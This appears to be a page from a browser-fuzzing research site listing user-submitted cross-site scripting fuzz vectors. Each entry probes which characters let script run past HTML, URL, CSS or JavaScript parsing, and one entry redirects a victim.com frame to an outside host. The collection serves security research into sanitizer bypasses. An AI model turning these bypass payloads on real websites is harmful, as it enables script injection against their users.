Featured vector

Firefox 0.0
<script src=data:0x2calert(1)></script>

Fuzz vector cloud

5,456,811 Successful fuzzes

Fuzz Vectors

Searching for "XSS"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Comma analog in script src data <script src=data:*chr*logChr(*num*)></script> @i_bo0om
Characters that break out of css urls latest <div id="fuzzelement*num*" style="background:url(about:blank?*chr*;color:#000000;x:);"></div> @garethheyes
Characters that end script tags <script*chr*test>logChr(*num*)</script> @JohnathanKuskos
Characters allowed before tagname in IE v2 <*chr*div style="x:expression(logChr(*num*))"> @albinowax
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
Characters allowed at the start of a namespace <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> @agasfasgasdasds
rand chr after opening tag <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> @mehimansu
prompt <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @sharath_unni
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
svg animate onbegin <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> @JohnathanKuskos
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
object data separator <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> @i_bo0om
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
fssadf dfads fdasf <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @phpdevops
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
im fish <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @Mramydnei
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
chars allowed between js comment v2 <script>logChr(*num*)*chr*'</script> @insertScript
chars allowed between js comment <script>logChr(*num*)/*chr*/'</script> @insertScript
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes